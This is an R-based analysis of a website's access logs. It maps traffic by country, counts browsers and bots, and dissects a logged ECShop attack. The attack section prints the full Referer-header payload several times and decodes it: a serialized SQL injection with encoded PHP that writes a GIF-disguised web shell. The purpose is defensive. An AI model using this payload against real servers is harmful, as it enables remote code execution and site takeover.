|
|
Analysis Tech Art Repositories | |||||||
library(ggplot2)
library(iptools)
library(gganimate)
library(transformr)
Git repositories for extra packages reference:
https://github.com/thomasp85/gganimate
https://github.com/thomasp85/transformr
Source of below includes: https://bcable.net/x/Rproj/shared
source("../../shared/load_recurse.R")
source("shared/load_varlog.R")
source("shared/parse_rawsplit.R")
source("shared/paths.R")
source("shared/cleanup_logs.R")
source("shared/geoip.R")
source("shared/country_code_cleanup.R")
source("shared/world_mapper.R")
site_name <- "bcable.net"
Geolocation based on IP address is not to be taken as entirely accurate as to the source of traffic or attacks conducted. There are many reasons for this, which include (but are not limited to):
Large quantities of traffic, especially attack based traffic, will use a VPN or the Tor network (or some reasonable facsimile), to mask the origin of the traffic. This will in turn change the appearance of the location of origin. Usually, an attacker will also intentionally want the traffic to appear to come from somewhere that has some form of lesser legal jurisdiction, some form of lesser ability to police traffic, or come from a well known source of malicious attacks such as China or Russia.
For instance, the following log entry was generated by myself against my servers while sitting at my desk in the United States, but it gets geolocated as Russia because of how the packet was sent. This sort of masking is trivial to perform, even by a nine year old on a cellphone.
httpd_data[grep("/from/russia/with/logs", httpd_data$Request), c("Request", "Response.Code", "Country.Code")]
## Request Response.Code Country.Code
## 1 GET /from/russia/with/logs HTTP/1.1 404 RU
Some locations will have a higher distribution of virtual servers than others, such as Silicon Valley or China. This can lead to larger quantities of vulnerable virtual machines and servers in those regions, and
It is possible that due to address assignment for governmental intelligence purposes or other economic or political reasons a nation could re-allocate address space and forge the identity similarly to a NAT (network address translation). They could also funnel information via VPN technologies for another nation.
Because most of these agreements are made in private, and due to the fact that most geolocation and WHOIS records are based on self-reporting, it is impossible to know the 100% true nature of geographic address assignment.
This geolocation uses the rgeolocate package available in CRAN, and uses the internal country database that is shipped with it. There could be an error in the database shipped, there could be an error in the lookup code, etc. Bugs happen. I have no reason to believe that there is any false geolocation is being performed by these packages, however.
Despite these weaknesses, this doesn't change the fact that looking at this sort of data can be quite fun and interesting, and potentially enlightening. Generalized conclusions should not be made from this data or the maps herein. You have been warned.
httpd_data <- load_varlog(file.path(path_appel, "httpd"), "access_log")
httpd_data <- raw_populate(httpd_data)
httpd_data <- cleanup_httpd(httpd_data)
httpd_data$IP.Address <- sapply(httpd_data$Raw.Split, FUN=function(x){ x[1]; })
httpd_data$Date <- sapply(httpd_data$Raw.Split, FUN=function(x){ x[4]; })
httpd_data$Date <- as.POSIXlt(httpd_data$Date,
format="[%d/%b/%Y:%H:%M:%S", tz=substr(httpd_data$Raw.Split[1][1], 1, 5)
)
httpd_data$Request <- sapply(httpd_data$Raw.Split, FUN=function(x){ x[6]; })
httpd_data$Response.Code <- sapply(
httpd_data$Raw.Split, FUN=function(x){ x[7]; }
)
httpd_data$Response.Length <- sapply(
httpd_data$Raw.Split, FUN=function(x){ x[8]; }
)
httpd_data$HTTP.Referer <- sapply(
httpd_data$Raw.Split, FUN=function(x){ x[9]; }
)
httpd_data$User.Agent <- sapply(httpd_data$Raw.Split, FUN=function(x){ x[10]; })
ret <- geoip(httpd_data$IP.Address, "country_code")
httpd_data$Country.Code <- ret$country_code
Date Min: 2018-08-26 03:16:04
Date Max: 2018-10-28 07:36:07
httpd_data[grep("/from/russia/with/logs", httpd_data$Request), c("Request", "Response.Code", "Country.Code")]
## Request Response.Code Country.Code
## 1 GET /from/russia/with/logs HTTP/1.1 404 RU
httpd_country_df <- country_code_cleanup(httpd_data$Country.Code)
g <- world_mapper(httpd_country_df)
g <- g + labs(
title=paste0(site_name, ": HTTPD: Hits by Country", collapse=""),
fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g
httpd_country_df <- country_code_cleanup(
httpd_data$Country.Code[httpd_data$Response.Code == 404]
)
g <- world_mapper(httpd_country_df)
g <- g + labs(
title=paste0(site_name, ": HTTPD: 404 Hits by Country", collapse=""),
fill="404 Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g
referer_dns <- sub(
"^http[s]?://([^/:]+)([/:].*)?$", "\\1",
httpd_data$HTTP.Referer, ignore.case=TRUE
)
referer_stats <- data.frame(
DNS.Address=names(table(referer_dns)),
Count=as.vector(table(referer_dns))
)
referer_ip <- iptools::hostname_to_ip(unique(referer_dns))
referer_ip <- sapply(referer_ip, FUN=function(x){ x[1]; })
ret <- geoip(referer_ip, "country_code")
referer_country_code <- ret$country_code
referer_merger <- data.frame(
IP.Address=referer_ip,
DNS.Address=unique(referer_dns),
Country.Code=referer_country_code
)
referer_df <- data.frame(DNS.Address=referer_dns)
referer_df <- merge(referer_df, referer_merger, by="DNS.Address")
referer_country_df <- country_code_cleanup(referer_df$Country.Code)
referer_country_df
## Country Count
## 1 Canada 5
## 2 China 24
## 3 Czech Republic 3
## 4 Germany 10
## 5 Estonia 3
## 6 France 27
## 7 Italy 1
## 8 Japan 2
## 9 South Korea 11
## 10 Kazakhstan 3
## 11 Russia 82
## 12 Sweden 1
## 13 Singapore 3
## 14 Taiwan 2
## 15 Ukraine 9
## 16 USA 5825
g <- world_mapper(referer_country_df)
g <- g + labs(
title=paste0(site_name, ": HTTP Referer DNS/GeoIP Lookup", collapse=""),
fill="Hits", x="", y=""
)
g <- g + scale_fill_continuous(low="#003000", high="#00E000", guide="colorbar")
g
ua_os <- c("Media Center PC", "Android", "iPhone", "360", "Linux", "Windows NT")
ua_browser <- c("MSIE", "Edge", "OPR", "Opera", "Chrome", "Safari", "Firefox")
ua_randbrowser <- c("QQBrowser", "gemini")
ua_randsoftware <- c("CarlosMatos", "curl", "Deepnet Explorer", "Hakai", "HeadlessChrome", "ia_archiver", "Jersey", "masscan", "PxBroker", "sysscan", "w3C_Validator", "zgrab", "sysscan", "axios")
ua_none <- c("-", "null")
ua_bot <- c("AhrefsBot", "AlphaBot", "Baidu", "bingbot", "coccocbot", "DotBot", "ExtLinksBot", "Googlebot", "ICC-Crawler", "Mail.RU_Bot", "MJ12bot", "magpie-crawler", "Nimbostratus-Bot", "oBot", "redditbot", "SEMrushBot", "Gluten Free Crawler", "RankingBot2", "ResearchScan", "SemrushBot", "SeznamBot", "SiteExplorer", "Sogou", "SEOkicks", "The Knowledge AI", "Wada.vn", "YandexBot", "YisouSpider", "ZoominfoBot", "www.probethenet.com", "python-requests", "^Mozilla/[45](\\.0)?$", "robots", "Mediapartners-Google", "PHPCrawl", "Java/1.", "Go-http-client", "LMAO", "Dataprovider.com", "Yahoo! Slurp", "SurdotlyBot", "DuckDuckGo-Favicons-Bot", "ZmEu", "CCBot", "MegaIndex.ru", "nmap", "MojeekBot", "BingPreview", "Ronin", "GigablastOpenSource", "facebookexternalhit", "btcrawler", "Gogolbot", "NetcraftSurveyAgent", "Virusdie", "Shinka", "Qwantify", "Gemini", "Telesphoreo", "Grobbot", "linkdexbot", "spuhex.com", "lua-resty-http", "PocketParser", "PxBroker", "HttpUrlConnection", "Indy Library", "CATExplorador", "Validator.nu", "Go [0-9]\\.[0-9] package http", "SafeDNSBot", "spbot", "Netcraft Web Server Survey", "Faraday", "fasthttp", "archive.org_bot", "WebCapture", "WinHttp.WinHttpRequest")
browser_count <- data.frame(
Browser=c("Bot", "Other", ua_browser),
Count=rep(0, length(ua_browser)+2)
)
# allow for data to be removed, so you don't double count things
temp_httpd_data <- httpd_data
# deal with bots first as one big group
browser_count$Count[browser_count$Browser == "Bot"] <- length(
grep(paste0(ua_bot, collapse="|"), temp_httpd_data$User.Agent)
)
temp_httpd_data <- temp_httpd_data[
grep(paste0(ua_bot, collapse="|"), temp_httpd_data$User.Agent, invert=TRUE),
]
# now deal with each browser
for(browser in ua_browser){
browser_count$Count[browser_count$Browser == browser] <-
length(grep(browser, temp_httpd_data$User.Agent))
temp_httpd_data <- temp_httpd_data[
grep(browser, temp_httpd_data$User.Agent, invert=TRUE)
,]
}
# the rest
browser_count$Count[browser_count$Browser == "Other"] <- length(temp_httpd_data)
os_count <- data.frame(
Browser=c(ua_browser),
Count=rep(0, length(ua_browser)+2)
)
## Error in data.frame(Browser = c(ua_browser), Count = rep(0, length(ua_browser) + : arguments imply differing number of rows: 7, 9
browser_count
## Browser Count
## 1 Bot 14133
## 2 Other 11
## 3 MSIE 1797
## 4 Edge 20
## 5 OPR 113
## 6 Opera 18
## 7 Chrome 7280
## 8 Safari 1723
## 9 Firefox 19932
g <- ggplot(browser_count, aes(x=Browser, y=Count))
g <- g + geom_bar(stat="identity")
g
This turned out to be quite a unique and complicated rabbit hole to dig down, actually.
Interesting attack from China, started by looking for “union” based SQL Injection in my logs:
httpd_data[grep("union", httpd_data$HTTP.Referer),]
## Raw
## 24015 [IPREDACTED] - - [23/Sep/2018:18:32:24 +0000] "GET //user.php?act=login HTTP/1.1" 302 221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24016 [IPREDACTED] - - [23/Sep/2018:18:32:25 +0000] "GET /user.php?act=login HTTP/1.1" 404 206 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24672 [IPREDACTED] - - [24/Sep/2018:11:26:06 +0000] "GET //user.php?act=login HTTP/1.1" 302 221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24673 [IPREDACTED] - - [24/Sep/2018:11:26:07 +0000] "GET /user.php?act=login HTTP/1.1" 404 206 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25609 [IPREDACTED] - - [25/Sep/2018:10:32:09 +0000] "GET //user.php?act=login HTTP/1.1" 302 221 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25610 [IPREDACTED] - - [25/Sep/2018:10:32:10 +0000] "GET /user.php?act=login HTTP/1.1" 404 206 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## File.Name
## 24015 access_log-20180930
## 24016 access_log-20180930
## 24672 access_log-20180930
## 24673 access_log-20180930
## 25609 access_log-20180930
## 25610 access_log-20180930
## Raw.Split
## 24015 [IPREDACTED], -, -, [23/Sep/2018:18:32:24, +0000], GET //user.php?act=login HTTP/1.1, 302, 221, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24016 [IPREDACTED], -, -, [23/Sep/2018:18:32:25, +0000], GET /user.php?act=login HTTP/1.1, 404, 206, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24672 [IPREDACTED], -, -, [24/Sep/2018:11:26:06, +0000], GET //user.php?act=login HTTP/1.1, 302, 221, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24673 [IPREDACTED], -, -, [24/Sep/2018:11:26:07, +0000], GET /user.php?act=login HTTP/1.1, 404, 206, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25609 [IPREDACTED], -, -, [25/Sep/2018:10:32:09, +0000], GET //user.php?act=login HTTP/1.1, 302, 221, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25610 [IPREDACTED], -, -, [25/Sep/2018:10:32:10, +0000], GET /user.php?act=login HTTP/1.1, 404, 206, 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## IP.Address Date
## 24015 [IPREDACTED] 2018-09-23 18:32:24
## 24016 [IPREDACTED] 2018-09-23 18:32:25
## 24672 [IPREDACTED] 2018-09-24 11:26:06
## 24673 [IPREDACTED] 2018-09-24 11:26:07
## 25609 [IPREDACTED] 2018-09-25 10:32:09
## 25610 [IPREDACTED] 2018-09-25 10:32:10
## Request Response.Code Response.Length
## 24015 GET //user.php?act=login HTTP/1.1 302 221
## 24016 GET /user.php?act=login HTTP/1.1 404 206
## 24672 GET //user.php?act=login HTTP/1.1 302 221
## 24673 GET /user.php?act=login HTTP/1.1 404 206
## 25609 GET //user.php?act=login HTTP/1.1 302 221
## 25610 GET /user.php?act=login HTTP/1.1 404 206
## HTTP.Referer
## 24015 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 24016 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 24672 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 24673 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 25609 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## 25610 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:504:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"'/*\\";}
## User.Agent
## 24015 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24016 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24672 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24673 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25609 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25610 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## Country.Code
## 24015 CN
## 24016 CN
## 24672 CN
## 24673 CN
## 25609 CN
## 25610 CN
Not really sure what they are trying to do here. There's not really much PHP on this site anymore (I've turned everything static for a reason). “user.php” doesn't exist, so I'm guessing this is an attempted attack on a specific piece of software.
Searching for “554fcae493e564ee0dc75bdf2ebf94ca”, the very unique hash came up with a few different websites that seem to have fallen victim to it. A quick MD5 crack comes up with the string “ecshop”. Searching for “ecshop” came up with the following GitHub project:
https://github.com/yezilong9/ecshop
With this “/user.php” that has a parameter check on “act=login”:
https://github.com/yezilong9/ecshop/blob/master/user.php
Dissecting this and using Google Translate to figure out some meanings:
“Mall system, support WeChat”
A WeChat based shopping system?
Member Centre ========================================================== * Copyright 2005-2012 Shanghai Shangpai Network Technology Co., Ltd., and all rights reserved. * Website address: http://www..com; * ------------------------------------------------- --------------------------- * This is not a free software! You may only modify the program code without commercial use and * Use; no re-release of the program code for any purpose or for any purpose.
Back to the payload itself, you can see that it uses what seems to be a pickled or serialized object of some kind, then injects into the variable some things to SQL inject with. This returns from no internal table, however, instead appears to dump into specific variable outputs that are expected to pull from return row 2 and 9.
0x272f2a
0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A3231356332687063484D75634768774A79776E52306C474F446C684944772F63476877436941674943416B5A6941394947356C647942535A575A735A574E3061573975526E5675593352706232346F496D467A63325679644349704F776F67494341674A475974506D6C75646D39725A5546795A334D6F59584A7959586B6F496952665545395456467466585349704B54734B507A357A65584E305A57306E4B513D3D2729293B2F2F7D787878
Which gets reverse hexdumped into:
{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ215c2hpcHMucGhwJywnR0lGODlhIDw/cGhwCiAgICAkZiA9IG5ldyBSZWZsZWN0aW9uRnVuY3Rpb24oImFzc2VydCIpOwogICAgJGYtPmludm9rZUFyZ3MoYXJyYXkoIiRfUE9TVFtfXSIpKTsKPz5zeXN0ZW0nKQ=='));//}xxx
It appears whatever in that base64_decode() call will be executed as PHP, let's find out what's in it!
file_put_contents('myships.php','GIF89a invokeArgs(array("$_POST[_]"));\n?>system')
So this injects some PHP that ends up saving a file (myships.php) that appears to look like a GIF file, but in reality, which is difficult to tell without dissecting the ecshop codebase, either executes POST variables as PHP or calls a system() call on some input. Either way, it's creating, through a very unique vector (HTTP Referer -> PHP Serialization Issue -> SQL Injection -> Obfuscated PHP Injection -> Save File), a PHP script that can do some form of remote code execution on a server.
Looking for this in the HTTPD logs again:
httpd_data[grep("myships.php", httpd_data$Request),]
## Raw
## 24017 [IPREDACTED] - - [23/Sep/2018:18:32:25 +0000] "GET //myships.php HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24018 [IPREDACTED] - - [23/Sep/2018:18:32:26 +0000] "GET /myships.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24674 [IPREDACTED] - - [24/Sep/2018:11:26:07 +0000] "GET //myships.php HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 24675 [IPREDACTED] - - [24/Sep/2018:11:26:07 +0000] "GET /myships.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25611 [IPREDACTED] - - [25/Sep/2018:10:32:10 +0000] "GET //myships.php HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## 25612 [IPREDACTED] - - [25/Sep/2018:10:32:10 +0000] "GET /myships.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
## File.Name
## 24017 access_log-20180930
## 24018 access_log-20180930
## 24674 access_log-20180930
## 24675 access_log-20180930
## 25611 access_log-20180930
## 25612 access_log-20180930
## Raw.Split
## 24017 [IPREDACTED], -, -, [23/Sep/2018:18:32:25, +0000], GET //myships.php HTTP/1.1, 302, 214, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24018 [IPREDACTED], -, -, [23/Sep/2018:18:32:26, +0000], GET /myships.php HTTP/1.1, 404, 209, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24674 [IPREDACTED], -, -, [24/Sep/2018:11:26:07, +0000], GET //myships.php HTTP/1.1, 302, 214, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 24675 [IPREDACTED], -, -, [24/Sep/2018:11:26:07, +0000], GET /myships.php HTTP/1.1, 404, 209, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25611 [IPREDACTED], -, -, [25/Sep/2018:10:32:10, +0000], GET //myships.php HTTP/1.1, 302, 214, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## 25612 [IPREDACTED], -, -, [25/Sep/2018:10:32:10, +0000], GET /myships.php HTTP/1.1, 404, 209, -, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
## IP.Address Date Request
## 24017 [IPREDACTED] 2018-09-23 18:32:25 GET //myships.php HTTP/1.1
## 24018 [IPREDACTED] 2018-09-23 18:32:26 GET /myships.php HTTP/1.1
## 24674 [IPREDACTED] 2018-09-24 11:26:07 GET //myships.php HTTP/1.1
